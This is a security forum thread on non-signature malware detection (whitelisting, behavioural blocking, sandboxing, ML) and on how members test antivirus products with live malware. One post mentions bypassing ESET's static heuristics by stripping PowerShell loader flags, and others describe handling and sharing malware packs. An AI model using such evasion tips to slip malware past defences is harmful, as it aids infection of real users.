Advice Request Any real-time software that uses non-traditional ways to find malware?

Please provide comments and solutions that are helpful to the author of this topic.

F

ForgottenSeer 89360

If that were the case, then all mainstream products (besides MalwareBytes) would utilize deny-by-default instead of allow-by-default ;). Even BAFS is a simple 20 second sandbox analysis, which ultimately is a pre-analyzed blacklist.
Not all companies adore the deny-by-default that Comodo has advertised heavily again, ages ago. Every vendor has a different understanding and concept of how their product should behave. ESET and McAfee for example focus solely on accuracy, performance and false positives reduction in their home products.
 

danb

From VoodooShield
Verified
Top Poster
Developer
Well-known
May 31, 2017
1,742
Unfortunately whitelisting won’t help against, to put it mildly, nasty documents with embedded OLEs and others. It also won’t protect against Java malware or any other malware that abuses trusted processes.
These can be prevented with various behavioural blocker policies, but Java is an offender that typically gets overlooked.

So if user only downloads *.exe files, yes, they run only *known safe* files. If you broaden the scope of what a user downloads and works with, then no. Some files would be unknown.
I agree, currently WLC only detects .exe files, but that does not mean we cannot add other file types in the future. WLC is only about a year old and there are a lot of really cool things we can do with it. Give it time ;).
 

ChoiceVoice

Level 6
Verified
Oct 10, 2014
284
i'm not sure what non-traditional wouldn't really encompass, but suppose you are pointing to non-signature detection. that would leave behavioural detection: but behavioural detection isn't a new concept (i mean, threatfire/cyberhawk was for XPs), in truth, much of the hoopla and hype about AI leaning detection is likely only behavioural detection with a new marketing angle. there does seem to be a newer form of behavioural detection, where they upload the file to a cloud sandbox and execute it, and then analyze it, but truth be told, this analysis is still just the old sigs and behavioural triggers of old, but performed in a safer environment. most AVs have all these aspects integrated now and it is hard to find a dedicated behavioural detection program. off the top of my head ... there is still winpatrol WAR. it hasn't been updated for a while, but it isn't sig based, so it likely still has some merit for what you're after (?).

how about this, take daily system snapshots and compare them over a regular time frame. if you get infected, it will be visible and can be rolled back ... but what a cumbersome headache that would be, heheh.

edit: yes, I see someone mentioned comodo above. execution control and user permissions can alert you to malware as well. so a good two-way firewall that asks you questions might be what you're looking for.
 
F

ForgottenSeer 89360

i'm not sure what non-traditional wouldn't really encompass, but suppose you are pointing to non-signature detection. that would leave behavioural detection: but behavioural detection isn't a new concept (i mean, threatfire/cyberhawk was for XPs), in truth, much of the hoopla and hype about AI leaning detection is likely only behavioural detection with a new marketing angle. there does seem to be a newer form of behavioural detection, where they upload the file to a cloud sandbox and execute it, and then analyze it, but truth be told, this analysis is still just the old sigs and behavioural triggers of old, but performed in a safer environment. most AVs have all these aspects integrated now and it is hard to find a dedicated behavioural detection program. off the top of my head ... there is still winpatrol WAR. it hasn't been updated for a while, but it isn't sig based, so it likely still has some merit for what you're after (?).

how about this, take daily system snapshots and compare them over a regular time frame. if you get infected, it will be visible and can be rolled back ... but what a cumbersome headache that would be, heheh.
Behavioural detection dates back to 2003 (Whole Security, later acquired by Symantec and the backbone of SONAR) and in official documentation, which I have already pointed to in my ESET review, reveals ESET has been using Machine Learning since 1995.
Cloud emulation/detonation has been around in various enterprise products for ages and Avast/AVG have been offering it for the past 5 years, if not more. So either way, nothing new 👍🏻👍🏻
 

danb

From VoodooShield
Verified
Top Poster
Developer
Well-known
May 31, 2017
1,742
I’m sorry, I don’t understand what you mean. In theory, pre-execution handling is always best. In practice, it’s not always possible with some products.
I am saying that the items you mentioned are not properly handled pre-execution when the security product is allow-by-default and the item is not determined to be malicious. In other words, pre-execution works best with deny-by-default.
 
F

ForgottenSeer 89360

I am saying that the items you mentioned are not properly handled pre-execution when the security product is allow-by-default and the item is not determined to be malicious. In other words, pre-execution works best with deny-by-default.
The items I mentioned might not be handled both by deny-by-default and allow-by-default products, other approaches are needed there. For example on my test with obfuscated PowerShell loaders (reputation is not applied on documents, bat and ps1 files) relying on BITS and benign website, I saw Kaspersky, ESET and QuickHeal were able to detect my malware using static heuristics.
ESET was easy to bypass, by removing -windowstyle hidden and other attributes.

Avast/AVG and WiseVector were able to intercept the PowerShell invocation through CMD and the WMI calls. AVG were quick to blacklist the links I generated specially for the download (2-3 minutes after behavioural blocker kicked in). Others, like Dr. Web failed.

You can have a look at my thread “How well are you protected against Emotet” for more details.
 
Last edited by a moderator:

danb

From VoodooShield
Verified
Top Poster
Developer
Well-known
May 31, 2017
1,742
The items I mentioned might not be handled both by deny-by-default and allow-by-default products, other approaches are needed there. For example on my test with obfuscated PowerShell loaders (reputation is not applied on documents, bat and ps1 files) relying on BITS and benign website, I saw Kaspersky, ESET and QuickHeal were able to detect my malware using static heuristics.
ESET was easy to bypass, by removing -windowstyle hidden and other attributes.

Avast/AVG and WiseVector were able to intercept the PowerShell invocation through CMD and the WMI calls. AVG were quick to blacklist the links I generated specially for the download (2-3 minutes after behavioural blocker kicked in). Others, like Dr. Web failed.
Call me crazy, but I personally believe that all vulnerable processes should be blocked when the user is browsing the web and checking email, especially when spawned from a web app.
 
F

ForgottenSeer 89360

Call me crazy, but I personally believe that all vulnerable processes should be blocked when the user is browsing the web and checking email, especially when spawned from a web app.
There are various approaches how this can be done, applied in various products (mainly enterprise). McAfee ENS features extensive set of rules that can completely deactivate many vulnerable parts of the OS (to an extent where its critical components are not broken). AVG/Avast IDP contains many profiles and policies that reduce the attack surface without any intervention.
Defender ATP and even the home version might be tweaked to reduce the attack surface as well.
 

danb

From VoodooShield
Verified
Top Poster
Developer
Well-known
May 31, 2017
1,742
There are various approaches how this can be done, applied in various products (mainly enterprise). McAfee ENS features extensive set of rules that can completely deactivate many vulnerable parts of the OS (to an extent where its critical components are not broken). AVG/Avast IDP contains many profiles and policies that reduce the attack surface without any intervention.
Defender ATP and even the home version might be tweaked to reduce the attack surface as well.
I am happy to see that someone else recognizes that critical components can be broken ;).

Here is some info on McAfee ENS, released in 2017. Certainly cool stuff they are working on...

"With the latest McAfee Endpoint Security, you don’t have to wait for a signature. If an executable has never been seen before, your endpoints automatically classify it as “greyware” and treat it with appropriate suspicion. Your endpoints first conduct pre-execution scanning of its code base—essentially a static look at the code (before it runs). Then, they perform dynamic analysis of the behavior during execution. All of these capabilities, and others, are part of protection at each endpoint that limits the damage and spread of greyware to other endpoints. And they’re designed and integrated to close that window of vulnerability—to stop malware even before security systems know exactly what it is."


I just find our approach a little easier, and if the user happens to allow something they should not, then McAfee would probably block it.

Fun conversation, but I have a lot to do, thank you!
 
F

ForgottenSeer 89360

I am happy to see that someone else recognizes that critical components can be broken ;).

Here is some info on McAfee ENS, released in 2017. Certainly cool stuff they are working on...

"With the latest McAfee Endpoint Security, you don’t have to wait for a signature. If an executable has never been seen before, your endpoints automatically classify it as “greyware” and treat it with appropriate suspicion. Your endpoints first conduct pre-execution scanning of its code base—essentially a static look at the code (before it runs). Then, they perform dynamic analysis of the behavior during execution. All of these capabilities, and others, are part of protection at each endpoint that limits the damage and spread of greyware to other endpoints. And they’re designed and integrated to close that window of vulnerability—to stop malware even before security systems know exactly what it is."


I just find our approach a little easier, and if the user happens to allow something they should not, then McAfee would probably block it.

Fun conversation, but I have a lot to do, thank you!
They have a lot more than that.
Glad you enjoyed our conversation, have a great and productive week ahead!
 

danb

From VoodooShield
Verified
Top Poster
Developer
Well-known
May 31, 2017
1,742
@danb
Thanks for your time and testing.
1) We also tested and ran all the samples you posted. The samples are old and some of them even more than 6 years old. Most samples missed by the our static scanning that are too old cannot perform malicious actions because their cc server has died. There are only two of the samples had obvious malicious behavior. One of them deleted itself immediately after starting without further action, the other released a Trojan which is blocked by our behavior detection. Anyway, we have added detection for the missed samples, thank you for sharing.
This obviously can also happen with dynamic analysis if a necessary dependency cannot be located and the sample fails to execute and exhibit malicious behaviors. So if a malware engine returns a not detected verdict for a file that was unable to execute based on dynamic analysis, this poses a serious issue when the malware is executed in the real world and the dependency is available, and the malware executes. In other words, both static and dynamic analysis are important, for different reasons, especially when it comes to building training data sets.

WV did very well and no one expects for any malware detection to be perfect... it never will be. Just look at all of the variation in the results that people posted on this thread.

BTW, I have a REALLY interesting malware pack that I am going to look for and if I can find it, post it somewhere on MT. It is probably 3-4 years old as well, but the results would be extremely interesting for all tested products.
 
F

ForgottenSeer 89360

Well unfortunately if we go and get a whole pack of malware, we won’t know if it has a dependancy, dead C&C server, or is just corrupt.
It’s a way of testing I personally don’t promote, but nevertheless, interesting to see.

My preferred type of test:
To conclude how good protection is, I test a product continuously for 14 days.
To perform the test I use samples and links collected from several sources, such as any.run, hybrid analyses, malwarebazaar and others. I have several emails that have been breached and registered in not-so-trustworthy websites, so these receive a vast amount of phishing emails. I analyse relations on VirusTotal and discover more and more malware, and links.

Every day the test includes:
  • 5 Phishing Links
  • 5 Malicious Links
  • 5 Malware Executables (*.exe files)
  • 5 Malicious Word/Excel Documents
  • 5 Scripts that abuse Windows processes
  • 5 Loaders that rely on PowerShell. I do not download these, but rather copy and paste the code into PowerShell.
  • Few Java malware files (*.jar)

I do not handpick links, but I specifically choose samples that are more difficult to detect (evasive, compressed, packed etc.). It's not necessary for these samples to be 0-days, but they should be prevalent.
Test has 2 outcomes - success (everything blocked) or failure (something has been missed)
A product must block everything to be successful.
It's not necessary for the malware sample to be deleted - for example blocking a loader from downloading any additional files is good enough.
At the end I use Hitman Pro, Norton Power Eraser and RogueKiller, as well as various utilities such as Process Explorer to establish whether everything has been blocked (when behavioural blocker has been involved.
In case of ransomware, products that support Secure Folders should keep the selected folders unencrypted.
I discard PUPs from the test, due to the fact that different vendors have different understanding of what's PUP. I consider misleading applications a form of malware.

As a last stage of the test I usually register a service, a scheduled task and auto-run pointing to a malware sample and containing malicious PowerShell code. I perform a scan and then check whether everything has been removed.

From time to time I can come up with other tests. These will be discussed in separate threads.
 
Last edited by a moderator:

danb

From VoodooShield
Verified
Top Poster
Developer
Well-known
May 31, 2017
1,742
Well unfortunately if we go and get a whole pack of malware, we won’t know if it has a dependancy, dead C&C server, or is just corrupt.
It’s a way of testing I personally don’t promote, but nevertheless, interesting to see.

My preferred type of test:
Interesting... that is a great guide. Do you have a different procedure for deny-by-default products who may or may not have malware detection?

BTW, I found the extremely interesting sample set I was talking about. It is basically an efficacy benchmark that was created by a well-known security company to benchmark VoodooAi three or so years ago. It was intended to test VoodooAi for malware detection efficacy along with false positives. I do not necessarily believe that every sample is classified correctly, but according to the people who chose the samples, each sample was carefully classified 100% correctly, and I trust them, so it is probably a REALLY good benchmark for malware and false positive detection. The samples are 3 or so years old, but that should make zero difference for static ML/Ai analysis.

These files are quite obscure, so WLC should classify most of them as Not Safe (even the clean files). I tested a handful of samples with WLC and sure enough, all were classified as Not Safe. I also ran a static test with WV.

There are 4,317 samples that are divided into 3 category folders… 2,202 clean, 1,065 pup and 1,050 malware. The file is a 15 gig renamed .zip file with the standard password. I tried to upload the file to google drive but it was too big, so if anyone has any ideas where I can store that file please let me know. I could put it on one of our servers, but the last time I did that we ran into some issues. I know that is a large file, but this would be a SUPER interesting test to perform on all products, especially Next-Gen ML/Ai.
 
F

ForgottenSeer 89360

I found this:

I haven't come up with any other procedures at the moment.
Again, downloading a whole malware pack means we don't know what we are dealing with, so results will be fuzzy.
 
Last edited by a moderator:

danb

From VoodooShield
Verified
Top Poster
Developer
Well-known
May 31, 2017
1,742
Thank you for the suggestion, but the upload finished on google drive, here is a link...


As I was saying, the archive is a 15 gig renamed .zip file with the standard password.

It will be really interesting to see the results for various products, especially the static "Next-Gen" ML/Ai results, since that is what this sample set was specifically designed for. If you guys think it is a good idea to move this to a new thread, please do.
 

danb

From VoodooShield
Verified
Top Poster
Developer
Well-known
May 31, 2017
1,742
I found this:

I haven't come up with any other procedures at the moment.
Again, downloading a whole malware pack means we don't know what we are dealing with, so results will be fuzzy.
Results are always fuzzy and highly variable with malware analysis ;). Which is why it will never be perfect, or really even close to perfect.

I have not looked at this malpak in a while, but this is just not a random group of samples just thrown together. The samples were vetted and chosen for a very specific reason... to benchmark the efficacy of static ML/Ai analysis. Which is why I figured it would be such an interesting malpak... I am just happy I found it ;).
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top